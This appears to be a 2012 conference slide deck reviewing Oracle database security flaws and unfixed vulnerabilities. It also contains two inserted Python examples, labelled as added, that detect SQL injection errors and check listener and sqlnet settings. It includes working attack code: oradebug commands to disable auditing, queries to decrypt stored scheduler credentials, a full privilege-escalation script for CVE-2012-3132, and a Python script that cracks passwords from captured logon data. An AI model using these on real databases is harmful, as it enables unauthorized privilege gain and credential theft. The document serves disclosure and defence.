Best of Oracle Security 2012 - Red-Database-Security
Best of Oracle Security 2012
What happened in 2012
Agenda
! Recapitulation 2011
! January 2012 - October 2012
! Q&A
Recapitulation 2011
Oradebug
! Undocumented function in Oracle
! Details published in 2011 (Hacktivity 2011*)
! Allows to run OS commands
! Allows to disable normal and SYS auditing
! Can't be audited
! Platform-independent solution without poke added
* http://soonerorlater.hu/download/hacktivity_lt_2011_en.pdf
UNFIXED
Disable Oracle Auditing
SQL> oradebug setmypid
Statement processed.
SQL> oradebug setvar sga kzaflg_ 0
BEFORE: [1492F4EC0, 1492F4EC4) = 00000001
AFTER: [1492F4EC0, 1492F4EC4) = 00000000
2012 - The Good, The Bad, The Ugly
The good
Lowest number of vulnerabilities in the Oracle database ever
! Only 17 findings in 2012 (2011: 29, 2010: 31)
! More remotely exploitable bugs: 8 (2011: 5)
• January 2012 CPU (2 vulnerabilities – 1 remote)
• April 2012 CPU (6 vulnerabilities – 3 remote)
• July 2012 CPU (4 vulnerabilities – 3 remote)
• October 2012 CPU (5 vulnerabilities – 1 remote)
The bad
Critical bugs are not fixed (only workarounds)
! SCN bug was not fixed
! TNS Poisoning was not fixed
! Stealth Password Cracking was not fixed
The ugly
Oracle Corporation
! Really bad communication skills (TNS poisoning)
! Unwilling to fix problems (TNS poisoning, stealth password cracking)
! Customers get the blame for issues not being fixed: „Customers have requested that Oracle not include such security fixes into Critical Patch Updates ...“
2012
January 2012
• Oracle CPU January 2012 *
• Problem with large Sequence Change Numbers (SCN) **
* http://www.oracle.com/technetwork/topics/security/cpujan2012-366304.html
** http://www.infoworld.com/d/security/fundamental-oracle-flaw-revealed-184163-0
January 2012 CPU*
• 2 security fixes (1 remotely exploitable)
• Core RDBMS
• TNS Listener
SCN Problem
! When Oracle databases link to each other, maintaining data consistency requires them to synchronize to a common SCN. The highest SCN is taken.
! Due to a problem in the backup the SCN increases dramatically
! The undocumented parameter _minimum_giga_scn allows the SCN to be set to a chosen value
! The backup bug and the undocumented parameter were fixed/removed via the January 2012 CPU.
* http://www.gokhanatil.com/2012/01/fundamental-oracle-flaw-revealed-lets.html
UNFIXED
[Diagram: DB1 (SCN: 10 Mio) and DB2 (SCN: 2 Mio) connected via a Database Link. Compare 10 Mio vs. 2 Mio, take the highest number.]
[Diagram: Undocumented Oracle parameter, or the backup bug, dramatically increases the SCN. Use the undocumented parameter and set the time of the attacker database to a point in the future and use a huge SCN. Attacker database (SCN: Huge SCN) with a Database Link to DB2: DB2 takes over the huge SCN, DB crash after a while.]
February 2012
• Get DBMS_SCHEDULER.CREATE_CREDENTIAL cleartext password *
• DBMS_SCHEDULER opens a port 4444 if undocumented parameters are used **
* http://berxblog.blogspot.com.au/2012/02/restore-dbmsschedulercreatecredential.html?utm_source=dlvr.it&utm_medium=twitter&utm_campaign=Feed:+orana+(OraNA
** http://berxblog.blogspot.com.au/2012/02/some-tracing-events-in-dbmsscheduler.html
Feature
Decrypt Oracle Scheduler Credentials
exec DBMS_SCHEDULER.CREATE_CREDENTIAL(credential_name => 'local_credential', username => 'oracle', password => 'welcome1');
select o.object_name credential_name, username, password
  FROM SYS.SCHEDULER$_CREDENTIAL c, DBA_OBJECTS o
 WHERE c.obj# = o.object_id;
CREDENTIAL_NAME    USERNAME PASSWORD
------------------ -------- ------------------------------------
LOCAL_CREDENTIAL   oracle   BWVYxxK0fiEGAmtiKXULyfXXgjULdvHNLg==
LOCAL_CREDENTIAL2  oracle2  BWyCCRtd8F0zAVYl44IhvVcJ2i8wNUniDQ==
SELECT u.name CREDENTIAL_OWNER, O.NAME CREDENTIAL_NAME, C.USERNAME,
       DBMS_ISCHED.GET_CREDENTIAL_PASSWORD(O.NAME, u.name) pwd
  FROM SYS.SCHEDULER$_CREDENTIAL C, SYS.OBJ$ O, SYS.USER$ U
 WHERE U.USER# = O.OWNER# AND C.OBJ# = O.OBJ#;
CREDENTIAL_OWNER CREDENTIAL_NAME      USERNAME PWD
---------------- -------------------- -------- --------
SYS              LOCAL_CREDENTIAL     oracle   welcome1
SYS              LOCAL_CREDENTIAL2    oracle2  welcome1
"...bit 0x20000 - start DBMS_DEBUG_JDWP.CONNECT_TCP in file watcher
bitand( ,131072) starts DBMS_DEBUG_JDWP.CONNECT_TCP on localhost, port 4444
I'm not sure if I like this event. In general I don't want any software opening connections without my knowing. And I could not find this documented anywhere. Is it fair to call this a backdoor?..."
Due to undocumented functionality DBMS_SCHEDULER listens on port 4444 if a special parameter is used.
Scheduler Credentials
March 2012
• Disabling Oracle trigger on a per-session basis *
• Self-Defending Databases **
* http://www.pythian.com/news/30781/disabling-triggers-per-session/
** http://www.red-database-security.com/wp/selfdefending_databases_hashdays_2012.pdf
Disable Oracle Triggers for a session
SQL> exec dbms_xstream_gg.set_foo_trigger_session_contxt(fire=>true);
PL/SQL procedure successfully completed.
Disable all triggers for a session. This could be used to bypass shadow/history table architectures.
Feature
Self-defending Databases
• Nearly every SQL injection attack from the web creates errors in the database
• A typical attack takes less than 2 minutes to download data
• 2 minutes are too short for humans to react
• But the database itself is able to detect this kind of attack by looking at the specific error messages created by the SQL injection attack
• After detection the appropriate countermeasures can be taken.
Detection of SQL Injection Attacks (from the web)
• Depending on the attack method used (UNION, extending the query, creating error messages to retrieve data, …) a specific error will be created, e.g.
ORA-01789: query block has incorrect number of result columns
• Or
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'mypassword' to a column of data type int. /Administrator/login.asp, line 27
Detection of SQL Injection Attacks (from the web)
Out of the box, databases like Oracle or Microsoft SQL Server are able to detect SQL-specific error messages and can run (custom) code (= countermeasure) after the detection.
These specific database errors only occur if a vulnerability exists and this vulnerability was triggered by a specific string (e.g. “or 1=1--”).
False positives are rare. A false positive could occur if developers deploy applications with incorrect SQL statements (e.g. missing single quote).
SQL Injection Error Codes Oracle - I
Error code   Error Message                                            Typical Command
ORA-00900    invalid SQL statement
ORA-00906    missing left parenthesis
ORA-00907    missing right parenthesis
ORA-00911    invalid character                                        e.g. PHP MAGIC_QUOTES_GPC activated and attempt to inject a single quote
ORA-00917    missing comma
ORA-00920    invalid relational operator
ORA-00923    FROM keyword not found where expected
ORA-00933    SQL command not properly terminated
ORA-00970    missing WITH keyword
ORA-01031    insufficient privileges                                  Attempted privilege escalation
ORA-01476    divisor is equal to zero                                 Blind SQL Injection attempt (e.g. sqlmap)
ORA-01719    outer join operator not allowed in operand of OR or IN
ORA-01722    invalid number                                           Enumeration with rownum and current rownum does not exist
SQL Injection Error Codes Oracle - II
Error code   Error Message                                                      Typical Command
ORA-01742    comment not properly terminated                                    inline comment, e.g. optimizer hint is not properly terminated
ORA-01756    quoted string not properly terminated                              single quote not properly terminated
ORA-01789    query block has incorrect number of result columns                 Attempt to use UNION SELECT
ORA-01790    expression must have same datatype as corresponding expression     Attempt to use UNION SELECT
ORA-24247    network access denied by access control list                       Oracle ACL has blocked the usage of UTL_INADDR (or similar)
ORA-29257    Host %S unknown                                                    Attempted SQL Injection via utl_inaddr
ORA-29540    Class does not exist                                               Attempted utl_inaddr attempt but Java is not installed
ORA-31011    XML parsing failed                                                 SQL Injection attempt via xmltype
ORA-19202    Error occurred in XML processing                                   SQL Injection via extractvalue
CREATE OR REPLACE TRIGGER after_error
AFTER SERVERERROR ON DATABASE
DECLARE
  sql_text  ORA_NAME_LIST_T;
  v_stmt    CLOB;          -- SQL statement causing the problem
  n         NUMBER;        -- number of chunks for constructing the sql statement causing the error
  v_program VARCHAR2(64);
  v_serial  NUMBER;
  v_sid     NUMBER;
BEGIN
  -- Version 1.00
  SELECT program, serial#, sid
    INTO v_program, v_serial, v_sid
    FROM v$session
   WHERE sid = sys_context('USERENV', 'SID');
  -- construct the sql text
  n := ora_sql_txt(sql_text);
  --
  IF n >= 1 THEN
    FOR i IN 1..n LOOP
      v_stmt := v_stmt || sql_text(i);
    END LOOP;
  END IF;
  --
  FOR j IN 1..ora_server_error_depth LOOP
    IF (lower(v_program) = 'iis.exe')  -- add your own application server
       AND (ora_server_error(j) IN ('942','900','906','907','911','917','920','923','933','970',
                                    '1031','1476','1719','1722','1742','1756','1789','1790',
                                    '19202','24247','29257','29540','31011')) THEN
      -- Potential attack was detected
      -- 1. Monitor the attack
      -- 2. Send an email to the responsible person (DBA/MoD)
      --    send_email (e.g. via utl_smtp)
      -- 3. Lock database user used by the webapp
      EXECUTE IMMEDIATE 'ALTER USER /* Error_Trigger */ "' || sys_context('USERENV', 'SESSION_USER') || '" account lock';
      -- 4. Terminate session: alter system kill session 'session-id,session-serial'
      EXECUTE IMMEDIATE 'ALTER SYSTEM /* Error_Trigger */ KILL SESSION ''' || v_sid || ',' || v_serial || '''';
      -- 5. Other countermeasures
    END IF;
  END LOOP;
  --
END after_error;
/
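The same error-code table used as detection logic outside the database, as an added example that is not from the slides: it runs over constructed log lines, applies the trigger's rule (web-tier program plus a listed ORA code), and prepares the countermeasure statements the trigger issues. The log format, the web program names and the sample lines are assumptions made for this example.

```python
"""Classify Oracle errors in application/DB error logs as SQL injection
indicators, using the code list from the two "SQL Injection Error Codes
Oracle" slides. Added example; log format and program names are assumed."""
import re
from collections import defaultdict

# ORA code -> error message (typical cause from the slides in parentheses)
SQLI_ERROR_CODES = {
    "ORA-00900": "invalid SQL statement",
    "ORA-00906": "missing left parenthesis",
    "ORA-00907": "missing right parenthesis",
    "ORA-00911": "invalid character (single quote injected with MAGIC_QUOTES_GPC on)",
    "ORA-00917": "missing comma",
    "ORA-00920": "invalid relational operator",
    "ORA-00923": "FROM keyword not found where expected",
    "ORA-00933": "SQL command not properly terminated",
    "ORA-00970": "missing WITH keyword",
    "ORA-01031": "insufficient privileges (attempted privilege escalation)",
    "ORA-01476": "divisor is equal to zero (blind SQL injection, e.g. sqlmap)",
    "ORA-01719": "outer join operator not allowed in operand of OR or IN",
    "ORA-01722": "invalid number (enumeration with rownum)",
    "ORA-01742": "comment not properly terminated (inline comment / hint)",
    "ORA-01756": "quoted string not properly terminated (single quote)",
    "ORA-01789": "query block has incorrect number of result columns (UNION SELECT attempt)",
    "ORA-01790": "expression must have same datatype as corresponding expression (UNION SELECT attempt)",
    "ORA-24247": "network access denied by access control list (UTL_INADDR blocked by ACL)",
    "ORA-29257": "host unknown (SQL injection via utl_inaddr)",
    "ORA-29540": "class does not exist (utl_inaddr attempt, Java not installed)",
    "ORA-31011": "XML parsing failed (SQL injection via xmltype)",
    "ORA-19202": "error occurred in XML processing (SQL injection via extractvalue)",
}

# Assumed log line layout (constructed for this example):
#   <timestamp> sid=<n> serial=<n> program=<exe> user=<name> ORA-nnnnn: <text>
LOG_LINE = re.compile(
    r"^(?P<ts>\S+) sid=(?P<sid>\d+) serial=(?P<serial>\d+) program=(?P<program>\S+) "
    r"user=(?P<user>\S+) (?P<code>ORA-\d{5}): (?P<msg>.*)$"
)

# Client programs of the web tier, mirroring the trigger's 'iis.exe' check
# on the slides; extend for your own application server (assumed names).
WEB_PROGRAMS = {"iis.exe", "w3wp.exe", "httpd"}


def parse_line(line):
    """Return the fields of one log line as a dict, or None if it does not match."""
    m = LOG_LINE.match(line.strip())
    return m.groupdict() if m else None


def find_injection_hits(log_text):
    """Group suspicious errors by session id.

    A line is a hit only when it comes from a web-tier program AND its ORA
    code is one the slides tie to SQL injection; one hit is enough to raise
    an alert, since these errors are rare in correctly deployed applications.
    Errors from other clients (sqlplus, batch jobs) are ignored on purpose.
    """
    hits = defaultdict(list)
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None or rec["program"].lower() not in WEB_PROGRAMS:
            continue
        cause = SQLI_ERROR_CODES.get(rec["code"])
        if cause is None:
            continue
        hits[rec["sid"]].append(dict(rec, cause=cause))
    return dict(hits)


def countermeasures(session_hits):
    """Statements the slides' SERVERERROR trigger runs for a flagged session:
    lock the web application's DB user and kill the session. Returned as
    strings for the DBA to review; nothing is executed here."""
    first = session_hits[0]
    return [
        'ALTER USER "%s" ACCOUNT LOCK' % first["user"],
        "ALTER SYSTEM KILL SESSION '%s,%s'" % (first["sid"], first["serial"]),
    ]


# Constructed sample log: sid 141 shows two UNION/quote errors from the web
# tier, sid 152 is a DBA typo in sqlplus, sid 163 is an ordinary app error.
SAMPLE_LOG = """\
2012-09-14T10:00:01 sid=141 serial=2207 program=iis.exe user=WEBAPP ORA-01789: query block has incorrect number of result columns
2012-09-14T10:00:02 sid=141 serial=2207 program=iis.exe user=WEBAPP ORA-01756: quoted string not properly terminated
2012-09-14T10:00:05 sid=152 serial=9 program=sqlplus.exe user=SCOTT ORA-00942: table or view does not exist
2012-09-14T10:00:09 sid=163 serial=411 program=iis.exe user=WEBAPP ORA-00001: unique constraint (WEBAPP.PK_ORDERS) violated
"""

if __name__ == "__main__":
    for sid, recs in find_injection_hits(SAMPLE_LOG).items():
        print("session %s: %d suspicious error(s)" % (sid, len(recs)))
        for r in recs:
            print("  %s -> %s" % (r["code"], r["cause"]))
        for stmt in countermeasures(recs):
            print("  planned: %s" % stmt)
```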
April 2012
• Oracle CPU April 2012 *
• TNS Poisoning **
• Critical MySQL Bug published ***
* http://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html
** http://seclists.org/fulldisclosure/2012/Apr/343
*** https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql
April 2012 CPU*
• 6 security fixes (3 remotely exploitable)
• Core RDBMS
• OCI
• Enterprise Manager
* http://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html
TNS Poisoning
• Reported by Joxean Koret to Oracle in 2008*
• Everyone with access to the listener can redirect any network traffic by registering a second listener.
• Affects all versions of Oracle (8i-11g R2)
• Due to a communication problem („was fixed in a future version“) the finder of this bug released an advisory including proof-of-concept code (for SIDs with 6 characters).
• To implement a workaround Oracle even changed the license agreement for RAC (inclusion of the Advanced Security Option, ASO) to be able to protect RAC.
UNFIXED
* http://seclists.org/fulldisclosure/2012/Apr/204
[Diagram: Listener, Attacker, Victim. The attacker registers an additional listener. When the victim logs on, the network traffic of the victim is redirected to the attacker and forwarded to the database again. The attacker is now man in the middle (MITM).]
TNS Poisoning - Statements Oracle*
• Oracle: „The fix is very complex and it is extremely risky to backport.“
• Oracle: „This fix is in a sensitive part of our code where regressions are a concern.“
• Oracle: „Customers have requested that Oracle not include such security fixes into Critical Patch Updates that increases the chance of regressions.“
• Oracle: „To protect the interest of our customers, we do not provide these level of details (like versions affected) for the issues that are addressed as in-depth. The future releases will have the fix.“
* http://seclists.org/fulldisclosure/2012/Apr/343
TNS Poisoning - Statement Researcher *
• Joxean: „So, as previously stated, this is a 0day
vulnerability with no patch, Oracle refuses to patch
the vulnerability in *any* existing version and Oracle
refuses to give details about which versions will have
the fix. But they say the vulnerability is fixed. Cool.“
* http://seclists.org/fulldisclosure/2012/Apr/343
TNS Poisoning - Workarounds
• There are different workarounds available (COST parameter, dynamic registration, restricted nodes)
• There are 2 documents for non-RAC and RAC systems available in Oracle MyOracleSupport (1453883.1, 1340831.1) describing the workarounds
• Testing is necessary to avoid side-effects (e.g. Grid Control, IP restriction in sqlnet.ora & IPC)
• set dynamic_registration=off
MySQL - Password Problem*,**
! On vulnerable versions of MySQL simply asking to authenticate repeatedly enough times is enough to bypass authentication: "Can I log in as root now?" "How about now?" "Now?"
! Pwnie for Best Server-Side Bug
! Free Scanner/Script to abuse this vulnerability available **
* http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2122
** https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql
*** https://community.rapid7.com/community/infosec/blog/2012/09/20/cve-2012-2122-mysql-password-vulnerability-scanner-scannow
May 2012
• nothing special happened
June 2012
• nothing special happened
July 2012
• Oracle CPU July 2012 *
* http://www.oracle.com/technetwork/topics/security/cpujul2012-392727.html
July 2012 CPU*
• 4 security fixes (3 remotely exploitable)
• Core RDBMS
• Enterprise Manager
• Network Layer
• A hidden security bug in Oracle Text (Blackhat 0day) was fixed without being mentioned.
• Fixing security bugs without documenting them is a common Oracle practice.
August 2012
• 0day privilege escalation exploit (CVE-2012-3132) for Oracle 11g released at BlackHat 2012 Las Vegas *
• Out-of-band patch for Oracle ** („Oracle Database Server versions 11.2.0.2 and 11.2.0.3 do not require patching if the July 2012 Critical Patch Update has been applied.“)
* http://www.slaviks-blog.com/2012/08/03/another-blackhat-another-oracle-0day/
** http://www.oracle.com/technetwork/topics/security/alert-cve-2012-3132-1721017.html
connect blackhat/password
set role dba; -- throws an error
create or replace function X return varchar authid current_user is
  pragma autonomous_transaction;
begin
  execute immediate 'GRANT DBA TO BLACKHAT';
  commit;
  return 'FOO';
END;
/
grant execute on X to public;
create table pwnoracle (id number(20) not null, "FOO'||BLACKHAT.X||'BAR" BLOB);
create index i_pwnoracle on pwnoracle("FOO'||BLACKHAT.X||'BAR") indextype is ctxsys.context;
exec dbms_stats.gather_table_stats(USER,'PWNORACLE',cascade=>TRUE);
drop table pwnoracle;
set role dba;
September 2012
• Stealth Password Cracking Exploit released
• Cleartext passwords at OCI Client Side
• Metasploit/Meterpreter Modules for
  • TNS Poisoning
  • Get Cleartext passwords clientside
  • Get Cleartext passwords serverside
  • Run OS Commands (via oradebug)
• Side Channel attack on ORA-00942
Stealth Password Cracking
! Flaw in the Oracle Logon Protocol (CVE-2012-3137) *
! Esteban Fayo found this issue 1 year ago and gave a talk „Cryptographic flaws in Oracle Database authentication protocol“ at the Ekoparty because Oracle was unwilling to fix this issue
! Due to a flaw in the logon protocol (Version 11) an attacker can crack passwords without invalid login attempts
! Incomplete logon is not audited
! Oracle did not fix this problem. They removed the OLogon 11 protocol once the CPU October 2012 is applied and recommend using the old DES hashes. ==> This could cause compatibility problems with clients < 11.2.0.3
* http://threatpost.com/en_us/blogs/flaw-oracle-logon-protocol-leads-easy-password-cracking-092012
** http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3137
UNFIXED
Stealth Password Cracking I
[Diagram: Attacker and database, steps numbered as follows]
1.) Logon: SYSTEM
2.) Get Hash and Salt of User SYSTEM (USER$.SPARE4)
3.) Generate a session key and fill the short session key with \x08\x08\x08\x08\x08\x08\x08\x08
4.) Send Salt + encrypted Session Key
5.) Stop logon process (no PW sent -> no invalid login attempt)
6.) Generate Password Hash (e.g. SHA1(manager||salt))
7.) Decrypt (AES) the encrypted session key with the hash generated in 6.)
8.) Check if the decrypted result contains \x08\x08\x08\x08\x08\x08\x08\x08
9.) If true then password found, else try a new password
Stealth Password Cracking II
! The attacker sends a username (e.g. SYSTEM) without a password to the database
! The database reads the password hash of the user SYSTEM
! A newly generated session key is padded with \x08\x08\x08\x08\x08\x08\x08\x08
! The result is encrypted (AES) with the password salt of the user
! The encrypted session key + the salt is sent to the attacker
! The attacker stops the login process
* http://threatpost.com/en_us/blogs/flaw-oracle-logon-protocol-leads-easy-password-cracking-092012
** http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3137
Stealth Password Cracking III
! The attacker now generates SHA1 hashes for common passwords using the salt received from the database
! This hash is used to decrypt the received session key
! If the decrypted result contains \x08\x08\x08\x08\x08\x08\x08\x08 the password is known
Pseudo-Code
! users.txt (list of common users)
  dict.txt (common passwords)
! for all entries in users.txt do
    result := send_logon_paket(USERNAME)
    if result contains a salt -- we found a valid user
    do
      for all passwords in dict.txt do
        hash := sha1(password||salt)
        decres := decrypt_aes(session_key, hash)
        if decres contains \x08\x08\x08\x08 then print „password found“
      od
    od
  od
! Thousands of (local) tests could be done in a second. Only 1 network packet per username
import hashlib
from Crypto.Cipher import AES   # PyCrypto; the script is Python 2 (str-based hex/print)

def decrypt(session, salt, password):
    pass_hash = hashlib.sha1(password + salt)
    key = pass_hash.digest() + '\x00\x00\x00\x00'        # 20-byte SHA1 + 4 zero bytes = 24-byte AES key
    decryptor = AES.new(key, AES.MODE_CBC, '\x00' * 16)  # zero IV, as in the original; newer libraries need it explicitly
    plain = decryptor.decrypt(session)
    return plain

session_hex = 'EA2043CB8B46E3864311C68BDC161F8CA170363C1E6F57F3EBC6435F541A8239B6DBA16EAAB5422553A7598143E78767'
salt_hex = 'A7193E546377EC56639E'
passwords = ['test', 'password', 'oracle', 'demo']

for password in passwords:
    session_id = decrypt(session_hex.decode('hex'), salt_hex.decode('hex'), password)
    print 'Decrypted session_id for password "%s" is %s' % (password, session_id.encode('hex'))
    if session_id[40:] == '\x08\x08\x08\x08\x08\x08\x08\x08':
        print 'PASSWORD IS "%s"' % password
        break
Stealth Password Cracking II
! Tools already exist (John the Ripper)
! Up to 1 million password tests per second
Mitigation of the problem
! (No patch) Switch back to the old DES password hashes by using the parameter SEC_CASE_SENSITIVE_LOGON=FALSE
! The Oracle October 2012 CPU removes the vulnerable protocol and automatically switches back to Ologon V10
! Set sqlnet.allowed_logon_version=12 to use Ologon protocol V12. This requires an 11.2.0.3 client
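An added configuration check, not from the slides or from any Oracle tool, that parses listener.ora and sqlnet.ora and reports whether the two workarounds named on this page are in place: dynamic_registration=off against TNS poisoning (workarounds slide) and allowed_logon_version=12 against stealth password cracking (this slide). The parameter spellings accepted, the .ora syntax handled and the sample file contents are assumptions of this example.

```python
"""Audit Oracle Net configuration for the two workarounds the slides name:
dynamic_registration=off (TNS Poisoning) in listener.ora and
sqlnet.allowed_logon_version=12 (Stealth Password Cracking) in sqlnet.ora.
Added example; the file contents below are constructed."""
import re

# Spellings from the slides plus the versioned forms Oracle uses
# (DYNAMIC_REGISTRATION_<listener_name>, SQLNET.ALLOWED_LOGON_VERSION_SERVER).
DYN_REG = re.compile(r"^DYNAMIC_REGISTRATION(_\w+)?$")
LOGON_VERSION = re.compile(r"^SQLNET\.ALLOWED_LOGON_VERSION(_SERVER)?$")


def parse_ora(text):
    """Parse a *.ora file into {NAME: value}. Values may span several lines
    inside parentheses; '#' starts a comment."""
    params, buf, depth = {}, [], 0
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        buf.append(line)
        depth += line.count("(") - line.count(")")
        entry = " ".join(buf)
        if depth > 0 or entry.endswith("="):
            continue  # value continues on the next line
        buf, depth = [], 0
        name, sep, value = entry.partition("=")
        if sep:
            params[name.strip().upper()] = value.strip()
    return params


def audit_listener_ora(text):
    """TNS Poisoning workaround: dynamic registration must be OFF for every
    listener, otherwise anyone reaching the port can register a listener."""
    params = parse_ora(text)
    found = [(n, v) for n, v in params.items() if DYN_REG.match(n)]
    if not found:
        return ["listener.ora: dynamic registration not disabled (default ON)"]
    return ["listener.ora: %s=%s, expected OFF" % (n, v)
            for n, v in found if v.upper() != "OFF"]


def audit_sqlnet_ora(text):
    """Stealth Password Cracking mitigation: only Ologon protocol V12 allowed
    (needs 11.2.0.3 clients, as the slides note)."""
    params = parse_ora(text)
    found = [(n, v) for n, v in params.items() if LOGON_VERSION.match(n)]
    if not found:
        return ["sqlnet.ora: sqlnet.allowed_logon_version not set, set it to 12"]
    return ["sqlnet.ora: %s=%s, expected 12" % (n, v)
            for n, v in found if not (v.isdigit() and int(v) >= 12)]


# Constructed sample files: the weak variant beside the hardened one.
WEAK_LISTENER = """\
LISTENER =
  (DESCRIPTION_LIST =
    (DESCRIPTION =
      (ADDRESS = (PROTOCOL = TCP)(HOST = db.example.test)(PORT = 1521))
    )
  )
# dynamic registration left at its default
"""
HARDENED_LISTENER = WEAK_LISTENER + "DYNAMIC_REGISTRATION_LISTENER = OFF\n"

WEAK_SQLNET = "NAMES.DIRECTORY_PATH = (TNSNAMES, EZCONNECT)\n"
HARDENED_SQLNET = WEAK_SQLNET + "SQLNET.ALLOWED_LOGON_VERSION_SERVER = 12\n"

if __name__ == "__main__":
    for label, l_text, s_text in [("weak", WEAK_LISTENER, WEAK_SQLNET),
                                  ("hardened", HARDENED_LISTENER, HARDENED_SQLNET)]:
        findings = audit_listener_ora(l_text) + audit_sqlnet_ora(s_text)
        print(label, findings or ["no findings"])
```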
DerbyCon / Hacktivity Presentation of László Tóth and Ferenc Spala
! Presentation about database security without SQL Injection
! New flaw in the OCI driver
! Presentation of tools for Metasploit to run OS commands, abuse the TNS poisoning bug and get cleartext passwords (server and client).
* http://soonerorlater.hu/download/DerbyCon2.0_think_differently_spala_toth.pdf
OCI Driver & Database Password
! Flaw in the OCI driver
! At the client side the password is stored encrypted (DES) in memory after the logon process has completed.
! Even if the database session is closed, the password (and username) stays in memory
! Laszlo and Ferenc released a tool for Metasploit to read and decrypt these passwords
! A trojan running on a DBA machine could use this to collect the decrypted passwords
! No workaround/fix is available
* http://soonerorlater.hu/download/DerbyCon2.0_think_differently_spala_toth.pdf
UNFIXED
Metasploit / Meterpreter Modules
! Metasploit is an open-source security framework. Meterpreter is an advanced payload for Metasploit
! Metasploit module oradebug: runs OS commands via oradebug call system
! Metasploit module tnspoison: allows redirecting network traffic to pytnsproxy
! PYTNSPROXY: TNS proxy which is used together with the tnspoison Metasploit module
! Meterpreter extension oralog: logs cleartext passwords by hooking into the encryption/decryption routine of the DB server
! Meterpreter extension ocioralog: logs the cleartext password from the OCI driver
Concept
! Metasploit is used to run TNS poisoning and redirect the TNS traffic to the PYTNSproxy.
! If a SYSDBA connects to the database server, the session can be taken over
! The oradebug feature is used to inject code into the process space of the database and hook into the decrypt functions
! All database passwords are written in cleartext into a text file (contains all passwords including DB Vault)
! The file with the passwords can be transferred to the computer of the attacker.
Run OS Commands from the web
http://soonerorlater.hu/download/DerbyCon2.0_think_differently_spala_toth.pdf
Side Channel attack on ORA-00942 *
! Martin Berger showed that a side channel attack is possible against Oracle and ORA-00942 *
! The number of recursive calls and the execute count allow one to find out whether an object exists.
* http://berxblog.blogspot.com.au/2012/09/side-channel-attack-on-ora-00942.html
select ms.sid, ms.statistic#, sn.name, ms.value
  from v$mystat ms, v$statname sn
 where sn.name in ('recursive calls', 'execute count')
   and ms.statistic# = sn.statistic#
 order by 2;
SQL> select * from a.uztrfghj;
select * from a.uztrfghj
                *
ERROR at line 1:
ORA-00942: table or view does not exist
21 recursive calls
3 execute count
No user ZZZ exists, but a user A does exist (though no table A.UZTRFGHJ). There is one more recursive call if the user exists.
SQL> select * from a.m ;
select * from a.m
                *
ERROR at line 1:
ORA-00942: table or view does not exist
26 recursive calls
7 execute count
Now there are even more recursive calls and a higher execute count: the table A.M exists.
October 2012
• Oracle CPU October 2012 *
• Application Security of Core Banking Systems **
* http://www.oracle.com/technetwork/topics/security/cpuoct2012-1515893.html
** https://www.sec-consult.com/en/Vulnerability-Lab/Studies.htm
October 2012 CPU*
• 5 security fixes (1 remotely exploitable)
• Core RDBMS
* http://www.oracle.com/technetwork/topics/security/cpuoct2012-1515893.html
November 2012
• DOAG 2012
Summary
! Annus Horribilis for Oracle (Java, MySQL, Oracle)
! Easy SQL Injection bugs in PL/SQL are nearly gone. Researchers are looking for more complicated bugs.
! Critical bugs are not fixed, only workarounds are available
! Nearly all databases (TNS Poisoning) or 11g databases (Stealth Password Cracking) are affected.
Thank you!
Contact:
Red-Database-Security GmbH
Bliesstr. 16
D-66538 Neunkirchen
Germany